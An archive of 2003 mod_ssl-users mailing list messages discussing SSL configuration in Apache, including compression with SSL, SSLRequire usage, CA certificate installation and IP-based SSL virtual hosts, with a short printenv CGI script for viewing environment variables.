> speed up the rest of the transaction since there's simply less data to
> encrypt and transmit.  How much speed improvement you get is completely
> dependent on how much compression you're getting.  If you can take a 100K
> document and compress it to 25K, that's a 75% reduction in the amount of
> data SSL needs to encrypt and reduces the number of packets from about 66
to
> around 16 - again, not including the SSL handshake/setup and general TCP
> setup/teardown.
>
> If you're bogging down your server with all the SSL transactions, look at
> investing in a SSL accelerator.  If your business model depends on both
> security *and* performance, then the cost (starting around 20K$USD) should
> be easily justified.  But that's the subject of another mail and I've got
> some coffee getting cold over here. ;-)
>
> Hope this didn't glaze your eyes over. :-)
> Best~
> -dsp
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Boyle Owen
> Sent: Tuesday, August 19, 2003 7:02 AM
> To: modssl-users@modssl.org
> Subject: RE: configuration question
>
>
>
>
> >-----Original Message-----
> >From: Arthur Chan [mailto:achana@saysit.com.hk]
> >
> >Hi Boyle,
> >I've been debating with myself over whether to encrypt
> >everything, that's a
> >cogent argument you have offered. I have a few questions myself :
> >(1) assuming an openssl encrypted packet is bigger than a
> >plain text one,
>
> Why would you assume this? Essentially;
>
> encrypted_text = f(plain_text, key)
>
> where f() is a mathematical function. I guess the 2nd law of
thermodynamics
> ("entropy increases") would tend to cause the output to increase but not
> necessarily by much. In the simple case of a substitutional cipher, the
> encrypted text would be precisely the same size as the plain text.
>
> >would mod_gzip shrink it significantly to warrant the effort?
>
> Zipping algorithms work by replacing repetitive sequences in the input
with
> shorter instructions to regenerate them (e.g. 1000 blue pixels -> "1 blue
> pixel x 1000"). Compression works best with highly structured input data
> (bitmaps, WAV files, human language etc). With random data, it can't make
> much difference and will even cause the file to grow! (try repeatedly
> zipping a file to see this happening).
>
> >(2) and would that slow down the client browser display of content ?
>
> Unzipping requires the client to have winzip - not a default on a windows
> client! Probably this would slow the whole thing down.
>
> Remember that SSL is well-defined on the web and all recent browsers
contain
> fast and effective SSL software - I would trust it to do its job and not
try
> to re-invent the wheel.
>
> Rgds,
> Owen Boyle
> Disclaimer: Any disclaimer attached to this message may be ignored.
>
> >On the other hand, with these new  1GHz+ P4 desk- and lap-tops
> >around, maybe
> >not.
> >
> >----- Original Message -----
> >From: "Boyle Owen" 
> >To: 
> >Sent: Tuesday, August 19, 2003 04:49 PM
> >Subject: RE: configuration question
> >
> >
> >>-----Original Message-----
> >>From: Henrik Bentel [mailto:hbentel@comcast.net]
> >>
> >>I have a web app which serves both static and non static content, both
> >>secure and unsecure(https and http).
> >>Now, all my ssl configuration is under my secure virtual host,
> >>such that it applies to everything. However, I have quite a bit static
> >>content(images, css, javascript.,...) which doesn't need to be very
> >secure. I
> >>somewhat only want to secure my dynamic content.
> >
> >To add to Cliff's comment about browsers complaining about the mix of
> >secure an insecure content there is a genuine security reason for *not*
> >doing what you propose.
> >
> >Put yourself in the position of a crook who has gained access to the
> >datastream flowing into your SSL server. As you are probably aware, all
> >encryption ciphers can be cracked by a brute force attack (making
> >repeated attempts at guesssing the key). Hopefully, the time-to-crack
> >will be "long", but you don't know how fast the crook's computer is. If
> >he works for the NSA, it might be very fast indeed. If you serve all
> >content via SSL, he has no idea which packets are important and which
> >are just images etc. so he has to crack everything. If you decide to
> >save a teeny bit of processing on the server by encrypting only the
> >important things, he then sees lots of "en clair" packets (containing
> >image data etc.) which he can safely ignore and only a few occasional
> >nuggets of encrypted data which he can be sure are worth cracking. Thus
> >he can focus his efforts on these. Therefore, you make life
> >easy for the
> >cracker by highlighting the packets that are worth cracking! In other
> >words, the best place to hide a leaf is in the forest.
> >
> >You shouldn't need to worry about the processing load of the SSL
> >encryption. If it is slowing your server, then, frankly, your server is
> >not powerful enough to serve the traffic you have - get more memory,
> >upgrade the chipset, do whatever is necessary to get up to speed.
> >
> >Rgds,
> >Owen Boyle
> >Disclaimer: Any disclaimer attached to this message may be ignored.
> >
> >>But, I don't want to generate absolute URLs on the fly to link to
> >>non-secure static content. What I want is to make request to
> >>certain urls
> >>"less secure" such that processing is faster. For example, I have a
> >>directory called art, which is just a defined alias for a
> >>directory. Is
> >>there a way to make ssl processing for this directory less
> >>restrictive than
> >>for the "generic requests" to the virtual host so that
> >>processing is faster?
> >>
> >>Home someone can help
> >>
> >>Henrik Bentel
> >>
> >>______________________________________________________________________
> >>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>User Support Mailing List                      modssl-users@modssl.org
> >>Automated List Manager                            majordomo@modssl.org
> >>
> >Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
> >keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss
> >Exchange.
> >This e-mail is of a private and personal nature. It is not related to
> >the exchange or business activities of the SWX Swiss Exchange. Le
> >présent e-mail est un message privé et personnel, sans rapport avec
> >l'activité boursière de la SWX Swiss Exchange.
> >
> >This message is for the named person's use only. It may contain
> >confidential, proprietary or legally privileged information. No
> >confidentiality or privilege is waived or lost by any mistransmission.
> >If you receive this message in error, please notify the sender urgently
> >and then immediately delete the message and any copies of it from your
> >system. Please also immediately destroy any hardcopies of the message.
> >You must not, directly or indirectly, use, disclose, distribute, print,
> >or copy any part of this message if you are not the intended recipient.
> >The sender's company reserves the right to monitor all e-mail
> >communications through their networks. Any views expressed in this
> >message are those of the individual sender, except where the message
> >states otherwise and the sender is authorised to state them to be the
> >views of the sender's company.
> >
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
keinen
> Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange. This
> e-mail is of a private and personal nature. It is not related to the
> exchange or business activities of the SWX Swiss Exchange. Le présent
e-mail
> est un message privé et personnel, sans rapport avec l'activité boursière
de
> la SWX Swiss Exchange.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 06:49:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0FE2CA8946; Wed, 20 Aug 2003 06:49:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 52849A8935
	for ; Wed, 20 Aug 2003 06:49:33 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.9/8.12.8/UVACS-2003031900) with ESMTP id h7K4nRvX004545;
	Wed, 20 Aug 2003 00:49:27 -0400 (EDT)
Date: Wed, 20 Aug 2003 00:49:27 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Arthur Chan 
Cc: modssl-users@modssl.org
Subject: Re: configuration question
In-Reply-To: <000e01c366d4$1b3d2dc0$0200a8c0@com>
Message-ID: 
References: 
 <000e01c366d4$1b3d2dc0$0200a8c0@com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 20 Aug 2003, Arthur Chan wrote:

> But I want Netscape to load my certificate as an "Authority" for our
> testing purposes. How does one go about doing that, both in Netscape and
> MSIE5 ?

Google knows everything... an "I'm feeling lucky" for "installing CA
certificate" yields:

http://www.pseudonym.org/ssl/ssl_ca.html

Which explains how to do just that.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 10:56:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01203A8945; Wed, 20 Aug 2003 10:56:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.blue-cable.net (poseidon.internet-on.tv [62.117.0.13])
	by master.modssl.org (Postfix) with ESMTP id 8C5C9A8934
	for ; Wed, 20 Aug 2003 10:56:13 +0200 (CEST)
Envelope-to: modssl-users@modssl.org
Received: from ncc-zwickau.internet-on.tv ([172.16.2.1] helo=blue-cable.net)
	by mail.blue-cable.net with esmtp (Exim 4.20)
	id 19pOlJ-0003bq-8I
	for modssl-users@modssl.org; Wed, 20 Aug 2003 10:56:13 +0200
Message-ID: <3F4337AB.6050707@blue-cable.net>
Date: Wed, 20 Aug 2003 10:56:11 +0200
From: Hendrik Robbel 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: how to nest SSLRequire
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Envelope-From: hendrik.robbel@blue-cable.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hendrik Robbel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I tried to nest two  with SSLRequire entries:


SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
             and %{SSL_CLIENT_S_DN_O} eq "user" )




SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
             and %{SSL_CLIENT_S_DN_O} eq "Global" )




But I got a 403 when I tried to access the /htdocs-ssl/user/ with a certificate, which
have the organisation entry "user".

It's the same with ,  ...


any ideas ?

Thanks in advance
Hendrik



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 11:02:15 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CA35DA8945; Wed, 20 Aug 2003 11:02:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id DC7FAA8934
	for ; Wed, 20 Aug 2003 11:02:14 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id F25A06E401B; Wed, 20 Aug 2003 11:02:11 +0200 (CEST)
Date: Wed, 20 Aug 2003 11:02:11 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: how to nest SSLRequire
Message-ID: <20030820090211.GB28381@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3F4337AB.6050707@blue-cable.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F4337AB.6050707@blue-cable.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Aug 20, 2003 at 10:56:11AM +0200, Hendrik Robbel wrote:
> Hi,
> 
> I tried to nest two  with SSLRequire entries:
> 
> 
> SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
>             and %{SSL_CLIENT_S_DN_O} eq "user" )
> 
> 
> 
> 
> SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
>             and %{SSL_CLIENT_S_DN_O} eq "Global" )
> 
> 
> 
> 
> But I got a 403 when I tried to access the /htdocs-ssl/user/ with a 
> certificate, which
> have the organisation entry "user".
> 
Why not just use REQUEST_URI as part of your SSLRequire statement
instead of wrapping it in 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A78F6A8945; Wed, 20 Aug 2003 12:28:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id EC536A8934
	for ; Wed, 20 Aug 2003 12:28:45 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id 584E31561F5
	for ; Wed, 20 Aug 2003 06:28:43 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP id 2873645356
	for ; Wed, 20 Aug 2003 06:28:42 -0400 (EDT)
Date: Wed, 20 Aug 2003 06:28:36 -0400
Subject: Re: configuration question
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <000e01c366d4$1b3d2dc0$0200a8c0@com>
Message-Id: <0E5F22E7-D2F9-11D7-B220-000393464F32@w3works.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On Wednesday, Aug 20, 2003, at 00:32 US/Eastern, Arthur Chan wrote:

> Well, my eyes did glaze over somewhere betw thermodynamics and mobile
> perpetuum ;-)
> So does this mean that if I work in a less sophisticated infrastructure
> where only 56kbps ppp dialup is available, I can get some incremental 
> gain
> by zipping it up before encrypting it ? [yes/no]

Yes.  ...And the larger the plaintext, the larger your gain, 
percentage-wise. (simply because larger plaintext files *tend* to 
shrink by a larger percentage when compressed)

> Caveats ?

Both compression and encryption are computationally expensive 
operations.  Don't skimp on the CPU for this machine.
[....]

Best~
-dsp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 13:04:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B1681A8945; Wed, 20 Aug 2003 13:04:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spf13.us4.outblaze.com (205-158-62-67.outblaze.com [205.158.62.67])
	by master.modssl.org (Postfix) with ESMTP id 48BD2A8934
	for ; Wed, 20 Aug 2003 13:04:41 +0200 (CEST)
Received: from 205-158-62-68.outblaze.com (205-158-62-68.outblaze.com [205.158.62.68])
	by spf13.us4.outblaze.com (Postfix) with QMQP id 13386180BF33
	for ; Wed, 20 Aug 2003 11:04:40 +0000 (GMT)
Received: (qmail 65571 invoked from network); 20 Aug 2003 11:04:39 -0000
Received: from unknown (HELO ws1-6.us4.outblaze.com) (205.158.62.53)
  by 205-158-62-153.outblaze.com with SMTP; 20 Aug 2003 11:04:39 -0000
Received: (qmail 7366 invoked by uid 1001); 20 Aug 2003 11:04:39 -0000
Message-ID: <20030820110439.7365.qmail@iname.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [194.228.23.10] by ws1-6.us4.outblaze.com with http for
    bos@writeme.com; Wed, 20 Aug 2003 06:04:39 -0500
From: "Jirka Vejrazka" 
To: modssl-users@modssl.org
Date: Wed, 20 Aug 2003 06:04:39 -0500
Subject: compression and SSL (was configuretion question)
X-Originating-Ip: 194.228.23.10
X-Originating-Server: ws1-6.us4.outblaze.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jirka Vejrazka" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just a word from real world - I have implemented compression (via mod_deflate) and SSL together and it was worth it. Simply because mod_deflate can shrink my typical html pages to 20-30% of original size (images are excluded from compression) and the SSL overhead is not that big. So, HTML sent through wires is encrypted and smaller that origin.

  Jirka Vejrazka
-- 
__________________________________________________________
Sign-up for your own personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

CareerBuilder.com has over 400,000 jobs. Be smarter about your job search
http://corp.mail.com/careers

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 17:37:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D6CC5A8946; Wed, 20 Aug 2003 17:37:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 24B73A8935
	for ; Wed, 20 Aug 2003 17:37:23 +0200 (CEST)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id 5D5ABABBE; Wed, 20 Aug 2003 08:44:17 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: configuration question
References: 
	
	
From: Eric Rescorla 
Date: 20 Aug 2003 08:44:17 -0700
In-Reply-To: 
Message-ID: 
Lines: 23
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Portable Code)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Cliff Woolley  writes:

> On Tue, 19 Aug 2003, Eric Rescorla wrote:
> 
> > "Dave Paris"  writes:
> > > In addition to Owen's salient points about compression working efficiently
> > > on repetitive strings in plaintext/binary data (e.g. whitespace in a Word
> > > document) and not on random data (e.g. encrypted data), some encryption
> > > algorithms can actually be weakened by compressing the resulting data,
> > > giving a cryptanalyzer clues to the inner workings of the algorithm.
> >
> > No reasonable encryption algorithm will be weakened this way.
> 
> I agree.  I'm guessing what he meant is that some encryption algorithms
> are weakened if their /input/ is pre-compressed by some known algorithm.
> If the cleartext is in some known format, it might possibly be easier to
> recover it from the ciphertext.

True. But no modern algorithm is susceptible to this kind of known
plaintext attack either. Moreover, SSL incorporates all sorts of
opportunities for known plaintext. I wouldn't worry about this one.

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 17:48:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3AC75A8972; Wed, 20 Aug 2003 17:48:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id 01CE2A8946
	for ; Wed, 20 Aug 2003 17:48:32 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id 17071FE5E
	for ; Wed, 20 Aug 2003 11:48:30 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id 189E845457
	for ; Wed, 20 Aug 2003 11:48:29 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: configuration question
Date: Wed, 20 Aug 2003 11:48:32 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I was not referring to post-encryption compression in the context of SSL or
other, proven, known-sane encryption algorithms.  I probably should have
made this point *much* clearer to avoid confusion.  I posed the scenario to
would-be cryptographers who [99.99999% of the time] wrongly believe they've
created the "next great encryption algorithm".

In any case, the Apache processing chain applies SSL as the last stage
anyway, so compressing *after* encryption, under normal Apache request
processing, won't happen without someone [who knows *exactly* what they're
doing] forcing the issue.

Best~
-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Eric Rescorla
Sent: Wednesday, August 20, 2003 11:44 AM
To: modssl-users@modssl.org
Subject: Re: configuration question


Cliff Woolley  writes:

> On Tue, 19 Aug 2003, Eric Rescorla wrote:
>
> > "Dave Paris"  writes:
> > > In addition to Owen's salient points about compression working
efficiently
> > > on repetitive strings in plaintext/binary data (e.g. whitespace in a
Word
> > > document) and not on random data (e.g. encrypted data), some
encryption
> > > algorithms can actually be weakened by compressing the resulting data,
> > > giving a cryptanalyzer clues to the inner workings of the algorithm.
> >
> > No reasonable encryption algorithm will be weakened this way.
>
> I agree.  I'm guessing what he meant is that some encryption algorithms
> are weakened if their /input/ is pre-compressed by some known algorithm.
> If the cleartext is in some known format, it might possibly be easier to
> recover it from the ciphertext.

True. But no modern algorithm is susceptible to this kind of known
plaintext attack either. Moreover, SSL incorporates all sorts of
opportunities for known plaintext. I wouldn't worry about this one.

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 01:33:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69FD6A8947; Thu, 21 Aug 2003 01:33:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by master.modssl.org (Postfix) with ESMTP id AAA82A8933
	for ; Thu, 21 Aug 2003 01:33:37 +0200 (CEST)
Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60])
	(authenticated bits=0)
	by mail.fpsn.net (8.12.9/8.12.9) with ESMTP id h7KNXOrd027074
	for ; Wed, 20 Aug 2003 17:33:27 -0600 (MDT)
Message-ID: <3F44052A.3030404@fpsn.net>
Date: Wed, 20 Aug 2003 17:32:58 -0600
From: Colin Faber 
Organization: fpsn.net, Inc. (http://www.fpsn.net)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4b) Gecko/20030507
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: CGI/SSL spec?
References: <20030724182555.GC8278@gonk.valueweb.net>
In-Reply-To: <20030724182555.GC8278@gonk.valueweb.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Filter-Engine: scanmail (Ruckus scanmail) 1.0-Beta (ab 1.90)
X-Filter-Url: http://www.fpsn.net/ruckus
X-Spam: No
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Colin Faber 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Philip,

Dumping the environment variables is a very simple task. Try:


#!/bin/sh
echo "Content-type: text/plain"
echo ""
/usr/bin/printenv


chmod it and stick it on your SSL server and run it.


Philip Champon wrote:

> Hi,
> 
> I tried searching the archives, to find out where I might be able
> to read about a CGI/SSL spec, but I couldn't turn anything up?
> While I have read the mod_ssl ref on envirionment variables, I was
> hoping to find out what source the group used to compile this list
> of environment variables. I also consulted the CGI spec, but it did
> not cover any SSL specific variables.
> 
> Could someone tell me, is there such a spec, or did the group arbitrarily
> compile a list of SSL env vars to include in the CGI env?
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 04:09:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E98E3A8947; Thu, 21 Aug 2003 04:09:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (law10-f72.law10.hotmail.com [64.4.15.72])
	by master.modssl.org (Postfix) with ESMTP id 78076A8933
	for ; Thu, 21 Aug 2003 04:09:05 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 20 Aug 2003 19:09:03 -0700
Received: from 203.59.129.168 by lw10fd.law10.hotmail.msn.com with HTTP;
	Thu, 21 Aug 2003 02:09:02 GMT
X-Originating-IP: [203.59.129.168]
X-Originating-Email: [iannewlands@hotmail.com]
From: "Ian Newlands" 
To: modssl-users@modssl.org
Subject: virtual hosting
Date: Thu, 21 Aug 2003 10:09:02 +0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Aug 2003 02:09:03.0004 (UTC) FILETIME=[3131E5C0:01C36789]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ian Newlands" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am currently running about 15 virtual hosts using name based on port 80, 
and 1 virtual host using SSL.

My SSL host is currently working with the following:

    

However I want to change this to the IP based hosting for this host, 
allowing me to then add more SSL based virtual hosts on this setup, so I 
tried changing this to the following:

    

By doing this my SSL virtual host stops working altogether.

I try the following to debug it on a remote machine:

    # openssl s_client -connect 203.xxx.xxx.xxx:443
    CONNECTED(00000003)
    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown 
protocol:s23_clnt.c:475:

I do the exact same thing on the local machine and it responds with a valid 
SSL response.

Can anyone suggest might be wrong here?

Regards,

Ian Newlands

_________________________________________________________________
Hotmail is now available on Australian mobile phones. Go to  
http://ninemsn.com.au/mobilecentral/signup.asp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 05:58:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DCB3DA8947; Thu, 21 Aug 2003 05:58:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 946C7A8933
	for ; Thu, 21 Aug 2003 05:58:57 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id BF80D15620D;
	Wed, 20 Aug 2003 23:58:55 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP
	id 2E8B645356; Wed, 20 Aug 2003 23:58:54 -0400 (EDT)
Date: Wed, 20 Aug 2003 23:58:48 -0400
Subject: Re: virtual hosting
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
Cc: "Ian Newlands" 
To: modssl-users@modssl.org
From: Dave Paris 
In-Reply-To: 
Message-Id: 
Content-Transfer-Encoding: 7bit
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

geeze.  is it that time of the month already for this question?  seems 
like it was just yesterday when it was asked last .. maybe I'm just 
thinking of the other 100,000 times it was asked.

in all seriousness, this dead horse has been beaten so many times on 
this list there isn't even a carcass left to hit at this point.  please 
